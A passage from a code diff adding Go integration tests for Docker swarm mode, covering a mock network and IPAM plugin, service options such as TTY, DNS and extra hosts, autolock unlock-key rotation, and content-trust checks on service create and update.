+	c.Assert(err, checker.IsNil)
+	bareID := strings.TrimSpace(out)[:12]
+	// Create a service
+	name := "busybox-top"
+	out, err = d.Cmd("service", "create", "--name", name, "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkServiceRunningTasks(name), checker.Equals, 1)
+
+	// Filter non-tasks
+	out, err = d.Cmd("ps", "-a", "-q", "--filter=is-task=false")
+	c.Assert(err, checker.IsNil)
+	psOut := strings.TrimSpace(out)
+	c.Assert(psOut, checker.Equals, bareID, check.Commentf("Expected id %s, got %s for is-task label, output %q", bareID, psOut, out))
+
+	// Filter tasks
+	out, err = d.Cmd("ps", "-a", "-q", "--filter=is-task=true")
+	c.Assert(err, checker.IsNil)
+	lines := strings.Split(strings.Trim(out, "\n "), "\n")
+	c.Assert(lines, checker.HasLen, 1)
+	c.Assert(lines[0], checker.Not(checker.Equals), bareID, check.Commentf("Expected not %s, but got it for is-task label, output %q", bareID, out))
+}
+
+const globalNetworkPlugin = "global-network-plugin"
+const globalIPAMPlugin = "global-ipam-plugin"
+
+func setupRemoteGlobalNetworkPlugin(c *check.C, mux *http.ServeMux, url, netDrv, ipamDrv string) {
+
+	mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, `{"Implements": ["%s", "%s"]}`, driverapi.NetworkPluginEndpointType, ipamapi.PluginEndpointType)
+	})
+
+	// Network driver implementation
+	mux.HandleFunc(fmt.Sprintf("/%s.GetCapabilities", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, `{"Scope":"global"}`)
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.AllocateNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		err := json.NewDecoder(r.Body).Decode(&remoteDriverNetworkRequest)
+		if err != nil {
+			http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest)
+			return
+		}
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, "null")
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.FreeNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, "null")
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.CreateNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		err := json.NewDecoder(r.Body).Decode(&remoteDriverNetworkRequest)
+		if err != nil {
+			http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest)
+			return
+		}
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, "null")
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.DeleteNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, "null")
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.CreateEndpoint", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, `{"Interface":{"MacAddress":"a0:b1:c2:d3:e4:f5"}}`)
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.Join", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+
+		veth := &netlink.Veth{
+			LinkAttrs: netlink.LinkAttrs{Name: "randomIfName", TxQLen: 0}, PeerName: "cnt0"}
+		if err := netlink.LinkAdd(veth); err != nil {
+			fmt.Fprintf(w, `{"Error":"failed to add veth pair: `+err.Error()+`"}`)
+		} else {
+			fmt.Fprintf(w, `{"InterfaceName":{ "SrcName":"cnt0", "DstPrefix":"veth"}}`)
+		}
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.Leave", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, "null")
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.DeleteEndpoint", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		if link, err := netlink.LinkByName("cnt0"); err == nil {
+			netlink.LinkDel(link)
+		}
+		fmt.Fprintf(w, "null")
+	})
+
+	// IPAM Driver implementation
+	var (
+		poolRequest       remoteipam.RequestPoolRequest
+		poolReleaseReq    remoteipam.ReleasePoolRequest
+		addressRequest    remoteipam.RequestAddressRequest
+		addressReleaseReq remoteipam.ReleaseAddressRequest
+		lAS               = "localAS"
+		gAS               = "globalAS"
+		pool              = "172.28.0.0/16"
+		poolID            = lAS + "/" + pool
+		gw                = "172.28.255.254/16"
+	)
+
+	mux.HandleFunc(fmt.Sprintf("/%s.GetDefaultAddressSpaces", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, `{"LocalDefaultAddressSpace":"`+lAS+`", "GlobalDefaultAddressSpace": "`+gAS+`"}`)
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.RequestPool", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		err := json.NewDecoder(r.Body).Decode(&poolRequest)
+		if err != nil {
+			http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest)
+			return
+		}
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		if poolRequest.AddressSpace != lAS && poolRequest.AddressSpace != gAS {
+			fmt.Fprintf(w, `{"Error":"Unknown address space in pool request: `+poolRequest.AddressSpace+`"}`)
+		} else if poolRequest.Pool != "" && poolRequest.Pool != pool {
+			fmt.Fprintf(w, `{"Error":"Cannot handle explicit pool requests yet"}`)
+		} else {
+			fmt.Fprintf(w, `{"PoolID":"`+poolID+`", "Pool":"`+pool+`"}`)
+		}
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.RequestAddress", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		err := json.NewDecoder(r.Body).Decode(&addressRequest)
+		if err != nil {
+			http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest)
+			return
+		}
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		// make sure libnetwork is now querying on the expected pool id
+		if addressRequest.PoolID != poolID {
+			fmt.Fprintf(w, `{"Error":"unknown pool id"}`)
+		} else if addressRequest.Address != "" {
+			fmt.Fprintf(w, `{"Error":"Cannot handle explicit address requests yet"}`)
+		} else {
+			fmt.Fprintf(w, `{"Address":"`+gw+`"}`)
+		}
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.ReleaseAddress", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		err := json.NewDecoder(r.Body).Decode(&addressReleaseReq)
+		if err != nil {
+			http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest)
+			return
+		}
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		// make sure libnetwork is now asking to release the expected address from the expected poolid
+		if addressRequest.PoolID != poolID {
+			fmt.Fprintf(w, `{"Error":"unknown pool id"}`)
+		} else if addressReleaseReq.Address != gw {
+			fmt.Fprintf(w, `{"Error":"unknown address"}`)
+		} else {
+			fmt.Fprintf(w, "null")
+		}
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.ReleasePool", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		err := json.NewDecoder(r.Body).Decode(&poolReleaseReq)
+		if err != nil {
+			http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest)
+			return
+		}
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		// make sure libnetwork is now asking to release the expected poolid
+		if addressRequest.PoolID != poolID {
+			fmt.Fprintf(w, `{"Error":"unknown pool id"}`)
+		} else {
+			fmt.Fprintf(w, "null")
+		}
+	})
+
+	err := os.MkdirAll("/etc/docker/plugins", 0755)
+	c.Assert(err, checker.IsNil)
+
+	fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", netDrv)
+	err = ioutil.WriteFile(fileName, []byte(url), 0644)
+	c.Assert(err, checker.IsNil)
+
+	ipamFileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", ipamDrv)
+	err = ioutil.WriteFile(ipamFileName, []byte(url), 0644)
+	c.Assert(err, checker.IsNil)
+}
+
+func (s *DockerSwarmSuite) TestSwarmNetworkPlugin(c *check.C) {
+	mux := http.NewServeMux()
+	s.server = httptest.NewServer(mux)
+	c.Assert(s.server, check.NotNil, check.Commentf("Failed to start an HTTP Server"))
+	setupRemoteGlobalNetworkPlugin(c, mux, s.server.URL, globalNetworkPlugin, globalIPAMPlugin)
+	defer func() {
+		s.server.Close()
+		err := os.RemoveAll("/etc/docker/plugins")
+		c.Assert(err, checker.IsNil)
+	}()
+
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("network", "create", "-d", globalNetworkPlugin, "foo")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "not supported in swarm mode")
+}
+
+// Test case for #24712
+func (s *DockerSwarmSuite) TestSwarmServiceEnvFile(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	path := filepath.Join(d.folder, "env.txt")
+	err := ioutil.WriteFile(path, []byte("VAR1=A\nVAR2=A\n"), 0644)
+	c.Assert(err, checker.IsNil)
+
+	name := "worker"
+	out, err := d.Cmd("service", "create", "--env-file", path, "--env", "VAR1=B", "--env", "VAR1=C", "--env", "VAR2=", "--env", "VAR2", "--name", name, "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	// The complete env is [VAR1=A VAR2=A VAR1=B VAR1=C VAR2= VAR2] and duplicates will be removed => [VAR1=C VAR2]
+	out, err = d.Cmd("inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.Env }}", name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "[VAR1=C VAR2]")
+}
+
+func (s *DockerSwarmSuite) TestSwarmServiceTTY(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "top"
+
+	ttyCheck := "if [ -t 0 ]; then echo TTY > /status && top; else echo none > /status && top; fi"
+
+	// Without --tty
+	expectedOutput := "none"
+	out, err := d.Cmd("service", "create", "--name", name, "busybox", "sh", "-c", ttyCheck)
+	c.Assert(err, checker.IsNil)
+
+	// Make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	// We need to get the container id.
+	out, err = d.Cmd("ps", "-a", "-q", "--no-trunc")
+	c.Assert(err, checker.IsNil)
+	id := strings.TrimSpace(out)
+
+	out, err = d.Cmd("exec", id, "cat", "/status")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+
+	// Remove service
+	out, err = d.Cmd("service", "rm", name)
+	c.Assert(err, checker.IsNil)
+	// Make sure container has been destroyed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0)
+
+	// With --tty
+	expectedOutput = "TTY"
+	out, err = d.Cmd("service", "create", "--name", name, "--tty", "busybox", "sh", "-c", ttyCheck)
+	c.Assert(err, checker.IsNil)
+
+	// Make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	// We need to get the container id.
+	out, err = d.Cmd("ps", "-a", "-q", "--no-trunc")
+	c.Assert(err, checker.IsNil)
+	id = strings.TrimSpace(out)
+
+	out, err = d.Cmd("exec", id, "cat", "/status")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+}
+
+func (s *DockerSwarmSuite) TestSwarmServiceTTYUpdate(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// Create a service
+	name := "top"
+	_, err := d.Cmd("service", "create", "--name", name, "busybox", "top")
+	c.Assert(err, checker.IsNil)
+
+	// Make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	out, err := d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.TTY }}", name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "false")
+
+	_, err = d.Cmd("service", "update", "--tty", name)
+	c.Assert(err, checker.IsNil)
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.TTY }}", name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "true")
+}
+
+func (s *DockerSwarmSuite) TestDNSConfig(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// Create a service
+	name := "top"
+	_, err := d.Cmd("service", "create", "--name", name, "--dns=1.2.3.4", "--dns-search=example.com", "--dns-option=timeout:3", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+
+	// Make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	// We need to get the container id.
+	out, err := d.Cmd("ps", "-a", "-q", "--no-trunc")
+	c.Assert(err, checker.IsNil)
+	id := strings.TrimSpace(out)
+
+	// Compare against expected output.
+	expectedOutput1 := "nameserver 1.2.3.4"
+	expectedOutput2 := "search example.com"
+	expectedOutput3 := "options timeout:3"
+	out, err = d.Cmd("exec", id, "cat", "/etc/resolv.conf")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, expectedOutput1, check.Commentf("Expected '%s', but got %q", expectedOutput1, out))
+	c.Assert(out, checker.Contains, expectedOutput2, check.Commentf("Expected '%s', but got %q", expectedOutput2, out))
+	c.Assert(out, checker.Contains, expectedOutput3, check.Commentf("Expected '%s', but got %q", expectedOutput3, out))
+}
+
+func (s *DockerSwarmSuite) TestDNSConfigUpdate(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// Create a service
+	name := "top"
+	_, err := d.Cmd("service", "create", "--name", name, "busybox", "top")
+	c.Assert(err, checker.IsNil)
+
+	// Make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	_, err = d.Cmd("service", "update", "--dns-add=1.2.3.4", "--dns-search-add=example.com", "--dns-option-add=timeout:3", name)
+	c.Assert(err, checker.IsNil)
+
+	out, err := d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.DNSConfig }}", name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "{[1.2.3.4] [example.com] [timeout:3]}")
+}
+
+func (s *DockerSwarmSuite) TestSwarmInitLocked(c *check.C) {
+	d := s.AddDaemon(c, false, false)
+
+	outs, err := d.Cmd("swarm", "init", "--autolock")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+
+	c.Assert(outs, checker.Contains, "docker swarm unlock")
+
+	var unlockKey string
+	for _, line := range strings.Split(outs, "\n") {
+		if strings.Contains(line, "SWMKEY") {
+			unlockKey = strings.TrimSpace(line)
+			break
+		}
+	}
+
+	c.Assert(unlockKey, checker.Not(checker.Equals), "")
+
+	outs, err = d.Cmd("swarm", "unlock-key", "-q")
+	c.Assert(outs, checker.Equals, unlockKey+"\n")
+
+	info, err := d.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+
+	c.Assert(d.Restart(), checker.IsNil)
+
+	info, err = d.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked)
+
+	cmd := d.command("swarm", "unlock")
+	cmd.Stdin = bytes.NewBufferString("wrong-secret-key")
+	out, err := cmd.CombinedOutput()
+	c.Assert(err, checker.NotNil, check.Commentf("out: %v", string(out)))
+	c.Assert(string(out), checker.Contains, "invalid key")
+
+	cmd = d.command("swarm", "unlock")
+	cmd.Stdin = bytes.NewBufferString(unlockKey)
+	out, err = cmd.CombinedOutput()
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", string(out)))
+
+	info, err = d.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+
+	outs, err = d.Cmd("node", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(outs, checker.Not(checker.Contains), "Swarm is encrypted and needs to be unlocked")
+
+	outs, err = d.Cmd("swarm", "update", "--autolock=false")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+
+	// Wait for autolock to be turned off
+	time.Sleep(time.Second)
+
+	c.Assert(d.Restart(), checker.IsNil)
+
+	info, err = d.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+
+	outs, err = d.Cmd("node", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(outs, checker.Not(checker.Contains), "Swarm is encrypted and needs to be unlocked")
+}
+
+func (s *DockerSwarmSuite) TestSwarmLeaveLocked(c *check.C) {
+	d := s.AddDaemon(c, false, false)
+
+	outs, err := d.Cmd("swarm", "init", "--autolock")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+
+	c.Assert(d.Restart("--swarm-default-advertise-addr=lo"), checker.IsNil)
+
+	info, err := d.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked)
+
+	outs, _ = d.Cmd("node", "ls")
+	c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked")
+
+	outs, err = d.Cmd("swarm", "leave", "--force")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+
+	info, err = d.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
+
+	outs, err = d.Cmd("swarm", "init")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+
+	info, err = d.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+}
+
+func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	outs, err := d.Cmd("swarm", "update", "--autolock")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+
+	c.Assert(outs, checker.Contains, "docker swarm unlock")
+
+	var unlockKey string
+	for _, line := range strings.Split(outs, "\n") {
+		if strings.Contains(line, "SWMKEY") {
+			unlockKey = strings.TrimSpace(line)
+			break
+		}
+	}
+
+	c.Assert(unlockKey, checker.Not(checker.Equals), "")
+
+	outs, err = d.Cmd("swarm", "unlock-key", "-q")
+	c.Assert(outs, checker.Equals, unlockKey+"\n")
+
+	// Rotate multiple times
+	for i := 0; i != 3; i++ {
+		outs, err = d.Cmd("swarm", "unlock-key", "-q", "--rotate")
+		c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+		// Strip \n
+		newUnlockKey := outs[:len(outs)-1]
+		c.Assert(newUnlockKey, checker.Not(checker.Equals), "")
+		c.Assert(newUnlockKey, checker.Not(checker.Equals), unlockKey)
+
+		c.Assert(d.Restart(), checker.IsNil)
+
+		info, err := d.info()
+		c.Assert(err, checker.IsNil)
+		c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked)
+
+		outs, _ = d.Cmd("node", "ls")
+		c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked")
+
+		cmd := d.command("swarm", "unlock")
+		cmd.Stdin = bytes.NewBufferString(unlockKey)
+		out, err := cmd.CombinedOutput()
+
+		if err == nil {
+			// On occasion, the daemon may not have finished
+			// rotating the KEK before restarting. The test is
+			// intentionally written to explore this behavior.
+			// When this happens, unlocking with the old key will
+			// succeed. If we wait for the rotation to happen and
+			// restart again, the new key should be required this
+			// time.
+
+			time.Sleep(3 * time.Second)
+
+			c.Assert(d.Restart(), checker.IsNil)
+
+			cmd = d.command("swarm", "unlock")
+			cmd.Stdin = bytes.NewBufferString(unlockKey)
+			out, err = cmd.CombinedOutput()
+		}
+		c.Assert(err, checker.NotNil, check.Commentf("out: %v", string(out)))
+		c.Assert(string(out), checker.Contains, "invalid key")
+
+		outs, _ = d.Cmd("node", "ls")
+		c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked")
+
+		cmd = d.command("swarm", "unlock")
+		cmd.Stdin = bytes.NewBufferString(newUnlockKey)
+		out, err = cmd.CombinedOutput()
+		c.Assert(err, checker.IsNil, check.Commentf("out: %v", string(out)))
+
+		info, err = d.info()
+		c.Assert(err, checker.IsNil)
+		c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+
+		outs, err = d.Cmd("node", "ls")
+		c.Assert(err, checker.IsNil)
+		c.Assert(outs, checker.Not(checker.Contains), "Swarm is encrypted and needs to be unlocked")
+
+		unlockKey = newUnlockKey
+	}
+}
+
+func (s *DockerSwarmSuite) TestExtraHosts(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// Create a service
+	name := "top"
+	_, err := d.Cmd("service", "create", "--name", name, "--host=example.com:1.2.3.4", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+
+	// Make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	// We need to get the container id.
+	out, err := d.Cmd("ps", "-a", "-q", "--no-trunc")
+	c.Assert(err, checker.IsNil)
+	id := strings.TrimSpace(out)
+
+	// Compare against expected output.
+	expectedOutput := "1.2.3.4\texample.com"
+	out, err = d.Cmd("exec", id, "cat", "/etc/hosts")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+}
+
+func (s *DockerSwarmSuite) TestSwarmManagerAddress(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+	d3 := s.AddDaemon(c, true, false)
+
+	// Manager Addresses will always show Node 1's address
+	expectedOutput := fmt.Sprintf("Manager Addresses:\n  127.0.0.1:%d\n", d1.port)
+
+	out, err := d1.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, expectedOutput)
+
+	out, err = d2.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, expectedOutput)
+
+	out, err = d3.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, expectedOutput)
+}
+
+func (s *DockerSwarmSuite) TestSwarmServiceInspectPretty(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "top"
+	out, err := d.Cmd("service", "create", "--name", name, "--limit-cpu=0.5", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	expectedOutput := `
+Resources:
+ Limits:
+  CPU:		0.5`
+	out, err = d.Cmd("service", "inspect", "--pretty", name)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf(out))
+}
+
+func (s *DockerSwarmSuite) TestSwarmNetworkIPAMOptions(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("network", "create", "-d", "overlay", "--ipam-opt", "foo=bar", "foo")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "map[foo:bar]")
+
+	out, err = d.Cmd("service", "create", "--network=foo", "--name", "top", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "map[foo:bar]")
+}
+
+// TODO: migrate to a unit test
+// This test could be migrated to unit test and save costly integration test,
+// once PR #29143 is merged.
+func (s *DockerSwarmSuite) TestSwarmUpdateWithoutArgs(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	expectedOutput := `
+Usage:	docker swarm update [OPTIONS]
+
+Update the swarm
+
+Options:`
+
+	out, err := d.Cmd("swarm", "update")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf(out))
+}
+
+func (s *DockerTrustedSwarmSuite) TestTrustedServiceCreate(c *check.C) {
+	d := s.swarmSuite.AddDaemon(c, true, true)
+
+	// Attempt creating a service from an image that is known to notary.
+	repoName := s.trustSuite.setupTrustedImage(c, "trusted-pull")
+
+	name := "trusted"
+	serviceCmd := d.command("-D", "service", "create", "--name", name, repoName, "top")
+	s.trustSuite.trustedCmd(serviceCmd)
+	out, _, err := runCommandWithOutput(serviceCmd)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "resolved image tag to", check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--pretty", name)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, repoName+"@", check.Commentf(out))
+
+	// Try trusted service create on an untrusted tag.
+
+	repoName = fmt.Sprintf("%v/untrustedservicecreate/createtest:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+	dockerCmd(c, "push", repoName)
+	dockerCmd(c, "rmi", repoName)
+
+	name = "untrusted"
+	serviceCmd = d.command("service", "create", "--name", name, repoName, "top")
+	s.trustSuite.trustedCmd(serviceCmd)
+	out, _, err = runCommandWithOutput(serviceCmd)
+
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--pretty", name)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+}
+
+func (s *DockerTrustedSwarmSuite) TestTrustedServiceUpdate(c *check.C) {
+	d := s.swarmSuite.AddDaemon(c, true, true)
+
+	// Attempt creating a service from an image that is known to notary.
+	repoName := s.trustSuite.setupTrustedImage(c, "trusted-pull")
+
+	name := "myservice"
+
+	// Create a service without content trust
+	_, err := d.Cmd("service", "create", "--name", name, repoName, "top")
+	c.Assert(err, checker.IsNil)
+
+	out, err := d.Cmd("service", "inspect", "--pretty", name)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	// Daemon won't insert the digest because this is disabled by
+	// DOCKER_SERVICE_PREFER_OFFLINE_IMAGE.
+	c.Assert(out, check.Not(checker.Contains), repoName+"@", check.Commentf(out))
+
+	serviceCmd := d.command("-D", "service", "update", "--image", repoName, name)
+	s.trustSuite.trustedCmd(serviceCmd)
+	out, _, err = runCommandWithOutput(serviceCmd)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "resolved image tag to", check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--pretty", name)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, repoName+"@", check.Commentf(out))
+
+	// Try trusted service update on an untrusted tag.
+
+	repoName = fmt.Sprintf("%v/untrustedservicecreate/createtest:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+	dockerCmd(c, "push", repoName)
+	dockerCmd(c, "rmi", repoName)
+
+	serviceCmd = d.command("service", "update", "--image", repoName, name)
+	s.trustSuite.trustedCmd(serviceCmd)
+	out, _, err = runCommandWithOutput(serviceCmd)
+
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out))
+}
+
+// Test case for issue #27866, which did not allow NW name that is the prefix of a swarm NW ID.
+// e.g. if the ingress ID starts with "n1", it was impossible to create a NW named "n1".
+func (s *DockerSwarmSuite) TestSwarmNetworkCreateIssue27866(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+	out, err := d.Cmd("network", "inspect", "-f", "{{.Id}}", "ingress")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+	ingressID := strings.TrimSpace(out)
+	c.Assert(ingressID, checker.Not(checker.Equals), "")
+
+	// create a network of which name is the prefix of the ID of an overlay network
+	// (ingressID in this case)
+	newNetName := ingressID[0:2]
+	out, err = d.Cmd("network", "create", "--driver", "overlay", newNetName)
